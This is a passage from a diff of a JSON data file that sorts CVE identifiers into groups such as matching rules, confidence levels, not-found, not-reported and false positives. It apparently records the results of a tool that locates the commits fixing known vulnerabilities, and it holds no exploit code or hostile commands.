+ "CVE-2013-2191", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1403", + "CVE-2014-8152", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-1326", + "CVE-2015-1782", + "CVE-2015-7541", + "CVE-2015-8309", + "CVE-2016-3114", + "CVE-2016-4974", + "CVE-2016-5180", + "CVE-2016-6298", + "CVE-2016-10173", + "CVE-2017-5934", + "CVE-2017-11427", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-15133", + "CVE-2017-16613", + "CVE-2017-16876", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10936", + "CVE-2018-11093", + "CVE-2018-12541", + "CVE-2018-12976", + "CVE-2018-16470", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20433", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1196", + "CVE-2019-1197", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-11512", + "CVE-2019-14751", + "CVE-2019-16784", + "CVE-2019-18622", + "CVE-2019-18848", + "CVE-2020-5219", + "CVE-2020-5390", + "CVE-2020-9283" + ], + "VULN_ID_IN_LINKED_ISSUE": [ + "CVE-2014-3579", + "CVE-2014-3612", + "CVE-2016-4974", + "CVE-2016-6298", + "CVE-2016-10173", + "CVE-2017-5946", + "CVE-2017-8028", + "CVE-2018-1320", + "CVE-2019-3826", + "CVE-2019-14863", + "CVE-2020-1747", + "CVE-2020-8131" + ], + "XREF_BUG": [ + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2014-3579", + "CVE-2016-2166", + "CVE-2017-15703", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-8013", + "CVE-2018-8016", + "CVE-2018-11771", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2020-1928", + "CVE-2012-1176", + "CVE-2013-4116", + "CVE-2014-3120", + "CVE-2014-6394", + "CVE-2014-9721", + "CVE-2015-4082", + "CVE-2015-7294", + "CVE-2015-8854", + "CVE-2016-3720", + "CVE-2016-5007", + "CVE-2016-6298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2017-2809", + "CVE-2017-5545", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-12098", + "CVE-2017-14735", + "CVE-2017-15133", + "CVE-2017-15703", + "CVE-2017-15879", + "CVE-2017-16013", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-18239", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1309", + "CVE-2018-3740", + "CVE-2018-3769", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-7408", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-9206", + "CVE-2018-10903", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-13797", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-17104", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17419", + "CVE-2018-18476", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-20059", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20962", + "CVE-2018-1000164", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2019-3826", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-7722", + "CVE-2019-9658", + "CVE-2019-10217", + "CVE-2019-10248", + "CVE-2019-11358", + "CVE-2019-11777", + "CVE-2019-12814", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15658", + "CVE-2019-16335", + "CVE-2019-17267", + "CVE-2019-17531", + "CVE-2019-18874", + "CVE-2019-19507", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-8131", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "COMMIT_IS_SECURITY_RELEVANT": [ + "CVE-2010-5312", + "CVE-2011-1950", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-3923", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1176", + "CVE-2012-2378", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-3536", + "CVE-2012-5812", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1607", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2013-2013", + "CVE-2013-2172", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4111", + "CVE-2013-4116", + "CVE-2013-4316", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-2525", + "CVE-2014-3120", + "CVE-2014-3250", + "CVE-2014-3488", + "CVE-2014-3576", + "CVE-2014-3577", + "CVE-2014-3579", + "CVE-2014-3612", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-7809", + "CVE-2014-8152", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2014-9970", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1772", + "CVE-2015-1782", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-6524", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-8854", + "CVE-2015-8862", + "CVE-2015-9235", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3114", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4000", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-4974", + "CVE-2016-4977", + "CVE-2016-5104", + "CVE-2016-5180", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-8738", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10528", + "CVE-2016-10529", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10558", + "CVE-2016-10559", + "CVE-2016-10560", + "CVE-2016-10575", + "CVE-2016-10577", + "CVE-2016-10591", + "CVE-2016-10611", + "CVE-2016-10694", + "CVE-2016-10703", + "CVE-2016-10735", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2617", + "CVE-2017-2652", + "CVE-2017-2667", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-4973", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5641", + "CVE-2017-5645", + "CVE-2017-5858", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-7674", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-9796", + "CVE-2017-11173", + "CVE-2017-11427", + "CVE-2017-11467", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-12098", + "CVE-2017-12616", + "CVE-2017-12620", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16007", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000389", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1260", + "CVE-2018-1261", + "CVE-2018-1263", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3714", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3731", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8013", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10903", + "CVE-2018-11093", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-14041", + "CVE-2018-14637", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16459", + "CVE-2018-16462", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16490", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17197", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000013", + "CVE-2018-1000014", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1197", + "CVE-2019-3564", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7617", + "CVE-2019-7722", + "CVE-2019-8331", + "CVE-2019-9212", + "CVE-2019-9658", + "CVE-2019-9844", + "CVE-2019-10131", + "CVE-2019-10217", + "CVE-2019-10240", + "CVE-2019-10248", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-10745", + "CVE-2019-10748", + "CVE-2019-10750", + "CVE-2019-10760", + "CVE-2019-10762", + "CVE-2019-10764", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10778", + "CVE-2019-10780", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10797", + "CVE-2019-10799", + "CVE-2019-10904", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11512", + "CVE-2019-11514", + "CVE-2019-11767", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12404", + "CVE-2019-12407", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13209", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15657", + "CVE-2019-15658", + "CVE-2019-16197", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18889", + "CVE-2019-18978", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19212", + "CVE-2019-19275", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1010266", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8125", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "medium": [ + "CVE-2013-3567", + "CVE-2013-4002", + "CVE-2014-5277", + "CVE-2014-7189", + "CVE-2016-10100", + "CVE-2016-10574", + "CVE-2017-2638", + "CVE-2017-12622", + "CVE-2017-1000451", + "CVE-2018-3738", + "CVE-2018-6591", + "CVE-2019-0207", + "CVE-2019-3772", + "CVE-2019-10089", + "CVE-2019-10090", + "CVE-2019-10756", + "CVE-2019-10757", + "CVE-2020-9281" + ], + "low": [ + "CVE-2016-4438", + "CVE-2016-10543", + "CVE-2016-10564", + "CVE-2016-10569", + "CVE-2017-7688", + "CVE-2019-10077" + ], + "not_found": [ + "CVE-2012-0881", + "CVE-2014-7143", + "CVE-2015-0250", + "CVE-2015-3627", + "CVE-2016-9962", + "CVE-2018-1196", + "CVE-2018-7576", + "CVE-2018-8031", + "CVE-2019-0219", + "CVE-2019-3792", + "CVE-2019-14537" + ], + "not_reported": [ + "CVE-2010-2245", + "CVE-2011-2730", + "CVE-2013-0248", + "CVE-2013-4204", + "CVE-2013-4286", + "CVE-2013-4322", + "CVE-2013-6235", + "CVE-2014-0050", + "CVE-2016-8739", + "CVE-2016-10532", + "CVE-2016-10562", + "CVE-2016-10566", + "CVE-2016-10567", + "CVE-2016-10568", + "CVE-2016-10570", + "CVE-2016-10571", + "CVE-2016-10572", + "CVE-2016-10573", + "CVE-2016-10576", + "CVE-2016-10586", + "CVE-2016-10587", + "CVE-2016-10588", + "CVE-2016-10626", + "CVE-2017-4971", + "CVE-2017-5638", + "CVE-2017-8046", + "CVE-2017-16029", + "CVE-2017-16083", + "CVE-2017-16084", + "CVE-2017-16107", + "CVE-2017-1000431", + "CVE-2018-3757", + "CVE-2018-6341", + "CVE-2018-6873", + "CVE-2018-8026", + "CVE-2018-14732", + "CVE-2018-16485", + "CVE-2018-17184", + "CVE-2018-20094", + "CVE-2019-5444", + "CVE-2019-5479", + "CVE-2019-10771", + "CVE-2019-10777", + "CVE-2019-12405" + ], + "false_positive": [ + "CVE-2010-0156", + "CVE-2010-0684", + "CVE-2010-2076", + "CVE-2010-4534", + "CVE-2010-4535", + "CVE-2010-5142", + "CVE-2011-1772", + "CVE-2011-2732", + "CVE-2011-2929", + "CVE-2011-2930", + "CVE-2011-2931", + "CVE-2011-2932", + "CVE-2011-3848", + "CVE-2011-3869", + "CVE-2011-3870", + "CVE-2011-3871", + "CVE-2011-3872", + "CVE-2011-4104", + "CVE-2011-4838", + "CVE-2011-5036", + "CVE-2011-5097", + "CVE-2011-5098", + "CVE-2012-0392", + "CVE-2012-0394", + "CVE-2012-1054", + "CVE-2012-1098", + "CVE-2012-1099", + "CVE-2012-1906", + "CVE-2012-1986", + "CVE-2012-1987", + "CVE-2012-2098", + "CVE-2012-2139", + "CVE-2012-2379", + "CVE-2012-2660", + "CVE-2012-2661", + "CVE-2012-3451", + "CVE-2012-3865", + "CVE-2012-3867", + "CVE-2012-4386", + "CVE-2012-4387", + "CVE-2012-4449", + "CVE-2012-4520", + "CVE-2012-5055", + "CVE-2012-5633", + "CVE-2012-6662", + "CVE-2012-6684", + "CVE-2012-6685", + "CVE-2012-6708", + "CVE-2013-0262", + "CVE-2013-0263", + "CVE-2013-0285", + "CVE-2013-1654", + "CVE-2013-1812", + "CVE-2013-2115", + "CVE-2013-2132", + "CVE-2013-2134", + "CVE-2013-2135", + "CVE-2013-2254", + "CVE-2013-2275", + "CVE-2013-4152", + "CVE-2013-4249", + "CVE-2013-4251", + "CVE-2013-4353", + "CVE-2013-4428", + "CVE-2013-4477", + "CVE-2013-4761", + "CVE-2013-5093", + "CVE-2013-5123", + "CVE-2013-6044", + "CVE-2013-6348", + "CVE-2013-6429", + "CVE-2013-6430", + "CVE-2013-7315", + "CVE-2013-7370", + "CVE-2013-7397", + "CVE-2013-7398", + "CVE-2014-0012", + "CVE-2014-0014", + "CVE-2014-0035", + "CVE-2014-0075", + "CVE-2014-0086", + "CVE-2014-0097", + "CVE-2014-0107", + "CVE-2014-0109", + "CVE-2014-0110", + "CVE-2014-0116", + "CVE-2014-0193", + "CVE-2014-0224", + "CVE-2014-0225", + "CVE-2014-0228", + "CVE-2014-1402", + "CVE-2014-1829", + "CVE-2014-1830", + "CVE-2014-1832", + "CVE-2014-1858", + "CVE-2014-1859", + "CVE-2014-1869", + "CVE-2014-1932", + "CVE-2014-1933", + "CVE-2014-2053", + "CVE-2014-2235", + "CVE-2014-2538", + "CVE-2014-3007", + "CVE-2014-3505", + "CVE-2014-3506", + "CVE-2014-3509", + "CVE-2014-3511", + "CVE-2014-3572", + "CVE-2014-3578", + "CVE-2014-3600", + "CVE-2014-3625", + "CVE-2014-3630", + "CVE-2014-3709", + "CVE-2014-3994", + "CVE-2014-4172", + "CVE-2014-4658", + "CVE-2014-4678", + "CVE-2014-7202", + "CVE-2014-7203", + "CVE-2014-7205", + "CVE-2014-8176", + "CVE-2014-8547", + "CVE-2014-8548", + "CVE-2014-8549", + "CVE-2014-8650", + "CVE-2014-8991", + "CVE-2014-9720", + "CVE-2014-10068", + "CVE-2014-10077", + "CVE-2015-0204", + "CVE-2015-0205", + "CVE-2015-0206", + "CVE-2015-0208", + "CVE-2015-0209", + "CVE-2015-0286", + "CVE-2015-0287", + "CVE-2015-0288", + "CVE-2015-0289", + "CVE-2015-0290", + "CVE-2015-0292", + "CVE-2015-0293", + "CVE-2015-1208", + "CVE-2015-1788", + "CVE-2015-1789", + "CVE-2015-1791", + "CVE-2015-1792", + "CVE-2015-1793", + "CVE-2015-1830", + "CVE-2015-2068", + "CVE-2015-2156", + "CVE-2015-2296", + "CVE-2015-2912", + "CVE-2015-2913", + "CVE-2015-3010", + "CVE-2015-3192", + "CVE-2015-3193", + "CVE-2015-3195", + "CVE-2015-3196", + "CVE-2015-3197", + "CVE-2015-3253", + "CVE-2015-3395", + "CVE-2015-3996", + "CVE-2015-4053", + "CVE-2015-4706", + "CVE-2015-5159", + "CVE-2015-5207", + "CVE-2015-5211", + "CVE-2015-5241", + "CVE-2015-5250", + "CVE-2015-5253", + "CVE-2015-5254", + "CVE-2015-5305", + "CVE-2015-5344", + "CVE-2015-5349", + "CVE-2015-5607", + "CVE-2015-6748", + "CVE-2015-6818", + "CVE-2015-6821", + "CVE-2015-6822", + "CVE-2015-6823", + "CVE-2015-6824", + "CVE-2015-6918", + "CVE-2015-7314", + "CVE-2015-7315", + "CVE-2015-7316", + "CVE-2015-7528", + "CVE-2015-7559", + "CVE-2015-8213", + "CVE-2015-8216", + "CVE-2015-8217", + "CVE-2015-8218", + "CVE-2015-8618", + "CVE-2015-8748", + "CVE-2015-8861", + "CVE-2015-8968", + "CVE-2015-9243", + "CVE-2015-9251", + "CVE-2016-0762", + "CVE-2016-1905", + "CVE-2016-2108", + "CVE-2016-2160", + "CVE-2016-2177", + "CVE-2016-2512", + "CVE-2016-2513", + "CVE-2016-2788", + "CVE-2016-3081", + "CVE-2016-3092", + "CVE-2016-3094", + "CVE-2016-3959", + "CVE-2016-4009", + "CVE-2016-4055", + "CVE-2016-4425", + "CVE-2016-4465", + "CVE-2016-4855", + "CVE-2016-4970", + "CVE-2016-4972", + "CVE-2016-5388", + "CVE-2016-6186", + "CVE-2016-6304", + "CVE-2016-6519", + "CVE-2016-6580", + "CVE-2016-6581", + "CVE-2016-6652", + "CVE-2016-6793", + "CVE-2016-6794", + "CVE-2016-6796", + "CVE-2016-6797", + "CVE-2016-6801", + "CVE-2016-6814", + "CVE-2016-6816", + "CVE-2016-6817", + "CVE-2016-6823", + "CVE-2016-7036", + "CVE-2016-7569", + "CVE-2016-8568", + "CVE-2016-8569", + "CVE-2016-8579", + "CVE-2016-8610", + "CVE-2016-8629", + "CVE-2016-8640", + "CVE-2016-8745", + "CVE-2016-8747", + "CVE-2016-8750", + "CVE-2016-8867", + "CVE-2016-9015", + "CVE-2016-9121", + "CVE-2016-9122", + "CVE-2016-9189", + "CVE-2016-9190", + "CVE-2016-9243", + "CVE-2016-9814", + "CVE-2016-9878", + "CVE-2016-9879", + "CVE-2016-10033", + "CVE-2016-10127", + "CVE-2016-10129", + "CVE-2016-10190", + "CVE-2016-10191", + "CVE-2016-10192", + "CVE-2016-10193", + "CVE-2016-10526", + "CVE-2016-10538", + "CVE-2016-10542", + "CVE-2016-10550", + "CVE-2016-10555", + "CVE-2016-10557", + "CVE-2016-10579", + "CVE-2016-10582", + "CVE-2016-10745", + "CVE-2016-10750", + "CVE-2016-1000232", + "CVE-2016-1000282", + "CVE-2017-0224", + "CVE-2017-0905", + "CVE-2017-0906", + "CVE-2017-0907", + "CVE-2017-0909", + "CVE-2017-0929", + "CVE-2017-2582", + "CVE-2017-2592", + "CVE-2017-2649", + "CVE-2017-2670", + "CVE-2017-3156", + "CVE-2017-4952", + "CVE-2017-4995", + "CVE-2017-5537", + "CVE-2017-5594", + "CVE-2017-5637", + "CVE-2017-5954", + "CVE-2017-7481", + "CVE-2017-7525", + "CVE-2017-7536", + "CVE-2017-7545", + "CVE-2017-7653", + "CVE-2017-7657", + "CVE-2017-7660", + "CVE-2017-7661", + "CVE-2017-7662", + "CVE-2017-7666", + "CVE-2017-7675", + "CVE-2017-7860", + "CVE-2017-7861", + "CVE-2017-7957", + "CVE-2017-8045", + "CVE-2017-8109", + "CVE-2017-8342", + "CVE-2017-8359", + "CVE-2017-9096", + "CVE-2017-9214", + "CVE-2017-9265", + "CVE-2017-9841", + "CVE-2017-10910", + "CVE-2017-11424", + "CVE-2017-11428", + "CVE-2017-11503", + "CVE-2017-11610", + "CVE-2017-12158", + "CVE-2017-12159", + "CVE-2017-12160", + "CVE-2017-12605", + "CVE-2017-12624", + "CVE-2017-12629", + "CVE-2017-12631", + "CVE-2017-12868", + "CVE-2017-12873", + "CVE-2017-14063", + "CVE-2017-14136", + "CVE-2017-14506", + "CVE-2017-14623", + "CVE-2017-14683", + "CVE-2017-15103", + "CVE-2017-15288", + "CVE-2017-15612", + "CVE-2017-15720", + "CVE-2017-15914", + "CVE-2017-16006", + "CVE-2017-16010", + "CVE-2017-16018", + "CVE-2017-16026", + "CVE-2017-16031", + "CVE-2017-16138", + "CVE-2017-16558", + "CVE-2017-16570", + "CVE-2017-16759", + "CVE-2017-16762", + "CVE-2017-16792", + "CVE-2017-17485", + "CVE-2017-17760", + "CVE-2017-17835", + "CVE-2017-17837", + "CVE-2017-18076", + "CVE-2017-18077", + "CVE-2017-18361", + "CVE-2017-18635", + "CVE-2017-1000001", + "CVE-2017-1000042", + "CVE-2017-1000056", + "CVE-2017-1000069", + "CVE-2017-1000070", + "CVE-2017-1000209", + "CVE-2017-1000246", + "CVE-2017-1000248", + "CVE-2017-1000427", + "CVE-2017-1000433", + "CVE-2017-1000450", + "CVE-2018-0737", + "CVE-2018-0953", + "CVE-2018-1067", + "CVE-2018-1114", + "CVE-2018-1193", + "CVE-2018-1199", + "CVE-2018-1259", + "CVE-2018-1272", + "CVE-2018-1273", + "CVE-2018-1274", + "CVE-2018-1284", + "CVE-2018-1304", + "CVE-2018-1314", + "CVE-2018-1336", + "CVE-2018-1339", + "CVE-2018-3711", + "CVE-2018-3728", + "CVE-2018-3743", + "CVE-2018-3758", + "CVE-2018-3777", + "CVE-2018-5773", + "CVE-2018-6517", + "CVE-2018-6596", + "CVE-2018-7212", + "CVE-2018-7489", + "CVE-2018-7575", + "CVE-2018-7711", + "CVE-2018-7750", + "CVE-2018-8006", + "CVE-2018-8008", + "CVE-2018-8009", + "CVE-2018-8014", + "CVE-2018-8017", + "CVE-2018-8025", + "CVE-2018-8027", + "CVE-2018-8030", + "CVE-2018-8037", + "CVE-2018-8038", + "CVE-2018-8039", + "CVE-2018-8088", + "CVE-2018-8097", + "CVE-2018-8315", + "CVE-2018-8359", + "CVE-2018-8416", + "CVE-2018-8465", + "CVE-2018-8473", + "CVE-2018-8510", + "CVE-2018-8541", + "CVE-2018-8899", + "CVE-2018-9856", + "CVE-2018-10237", + "CVE-2018-10862", + "CVE-2018-10912", + "CVE-2018-11039", + "CVE-2018-11040", + "CVE-2018-11087", + "CVE-2018-11248", + "CVE-2018-11307", + "CVE-2018-11627", + "CVE-2018-11647", + "CVE-2018-11758", + "CVE-2018-11761", + "CVE-2018-11762", + "CVE-2018-11775", + "CVE-2018-11777", + "CVE-2018-11784", + "CVE-2018-11786", + "CVE-2018-11787", + "CVE-2018-11788", + "CVE-2018-11797", + "CVE-2018-12022", + "CVE-2018-12023", + "CVE-2018-12537", + "CVE-2018-12540", + "CVE-2018-12544", + "CVE-2018-12608", + "CVE-2018-13790", + "CVE-2018-13863", + "CVE-2018-14040", + "CVE-2018-14042", + "CVE-2018-14371", + "CVE-2018-14574", + "CVE-2018-14635", + "CVE-2018-14642", + "CVE-2018-14731", + "CVE-2018-14774", + 